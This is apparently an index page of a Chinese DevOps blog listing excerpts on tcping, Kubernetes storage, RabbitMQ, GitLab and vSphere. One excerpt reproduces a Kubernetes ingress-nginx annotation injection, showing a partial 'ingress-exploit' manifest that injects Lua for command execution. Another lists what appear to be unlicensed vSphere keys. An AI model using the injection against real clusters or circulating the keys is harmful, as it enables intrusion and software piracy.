2023-11-20 myluzh
Linux
0x01 安装依赖
# CentOS
yum install -y tcptraceroute bc
# Debian/Ubuntu
apt-get install -y tcptraceroute bc
0x02 安装tcping
vim tcping
#!/bin/sh
#
# tcpping: test response times using TCP SYN packets
# URL: http://www.vdberg.org/~richard/tcpping.html
# uses tcptraceroute from http://michael.toren.net/code/tcptraceroute/
# (c) 2002-2005 Richard van den Berg <richard@vdberg.org> under the GPL
# 2008/02/10 v1.7 make -C work when reverse lookup fails, courtesy of Fabrice Le Dorze <Fabrice.LeDorze@apx.fr>
ver="v1...
阅读全文>>
标签: centos tcping
评论(0)
(66)
2023-11-16 myluzh
Kubernetes
0x01 开头
这里的ingress一定要是nginx,进行复现的环境k8s版本是1.25,ingress里面参数nginx.ingress.kubernetes.io/rewrite-target,可以任意插入,就尝试插入 lua 代码通过注解注入特殊字符尝试闭合nginx配置文件块从而实现插入任意配置实现命令执行。
0x02 复现
1、exp-ingress.yaml如下
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: ingress-exploit
annotations:
kubernetes.io/ingress.class: "nginx"
nginx.ingress.kubernetes.io/rewrite-target: |
execute-command/ last;
}
location execute-command/ {
content_by_lua_block {
local handle =...
阅读全文>>
标签: k8s nginx Ingress exp
评论(0)
(52)
2023-11-9 myluzh
Kubernetes
0x00 介绍
1、nfs-client-provisioner
在Kubernetes中,一个PersistentVolume(PV)只能绑定到一个PersistentVolumeClaim(PVC)。PV和PVC之间是一对一的关系,每个PVC只能绑定到一个PV。
使用支持动态PV和PVC创建的存储插件(如nfs-client-provisioner),您可以为每个PVC动态创建一个独立的PV。这样,每个PVC都有自己的PV,但它们可以共享相同的存储资源。
2、StorageClass
StorageClass充当PV和PVC之间的中间层,它定义了如何动态创建PersistentVolume(PV)。当您创建一个PVC并指定一个StorageClass时,Kubernetes会根据该StorageClass的定义自动创建一个符合要求的PV来满足PVC的需求。可以将StorageClass理解为一种存储资源的池。当您创建一个PVC并指定了某个StorageClass时,Kubernetes会根据该StorageClass的定义来动态创建一个PV,并将其绑定到该PV...
阅读全文>>
标签: k8s nfs pv pvc nfs-client-provisioner storageclass
评论(0)
(274)
2023-11-9 myluzh
Kubernetes
0x01 定制RabbitMQ镜像
本文章基于DockerHub镜像rabbitmq:3.12.8-management,由于官方镜像没有集成有些插件,需要在镜像中安装插件并重新打包。
rabbitmq_delayed_message_exchange延迟队列插件的安装,rabbitmq 插件下载(官网):https://www.rabbitmq.com/community-plugins.html【根据rabbitmq版本选择对应的插件,web管理页面首页可以查看rabbitmq版本】,手动安装插件教程参考:https://blog.csdn.net/user2025/article/details/105620908
下载完成rabbitmq_delayed_message_exchange-3.12.0.ez后,放到跟dockerfile同一目录,然后使用docker build进行打包。
DockerFile如下:
FROM rabbitmq:3.12.8-management
ADD ./rabbitmq_delayed_message_exchange-3.12.0.ez /pl...
阅读全文>>
标签: docker k8s dockerfile rabbitmq
评论(0)
(128)
2023-11-8 myluzh
Docker
0x01 docker部署
docker run -d \
--name gitlab \
-p 9443:443 \
-p 9999:80 \
-p 9998:22 \
-v /etc/gitlab:/etc/gitlab \
-v /var/log/gitlab:/var/log/gitlab \
-v /var/opt/gitlab:/var/opt/gitlab \
-v /etc/localtime:/etc/localtime \
--privileged=true \
gitlab/gitlab-ce:latest
访问地址:http://IP:9999
首次登陆页面的账号是root,密码则是临时密码,保存在/etc/gitlab/initial_root_password中,初始密码保存24小时,自动删除,首次登陆后需要修改密码操作。
0x02 配置ssh秘钥
SSH密钥用于在您的电脑和GitLab建立安全连接。 SSH 指纹验证客户端是否连接到正确的主机。
# 在本地计算机上生成了SSH密钥对,请将 "your_ema...
阅读全文>>
标签: docker gitlib git
评论(0)
(92)
2023-11-8 myluzh
VMware
0x01 vSphere 8的新增功能
VMware vSphere 8是一个企业工作负载平台,它为本地工作负载带来了云的好处。它通过基于DPU和GPU的加速增强了性能,通过VMware云控制台提高了运营效率,与附加混合云服务无缝集成,并通过与VM一起运行容器的企业级集成Kubernetes运行时加速了创新。
0x02 许可注册
vSphere Enterprise Plus:
HG00K-03H8K-48929-8K1NP-3LUJ4
4F40H-4ML1K-M89U0-0C2N4-1AKL4
vCenter Standard :
4F282-0MLD2-M8869-T89G0-CF240
0F41K-0MJ4H-M88U1-0C3N0-0A214
来源于:https://technet24.ir/vmware-vsphere-8-26918
阅读全文>>
标签: vmware vSphere 许可证
评论(0)
(61)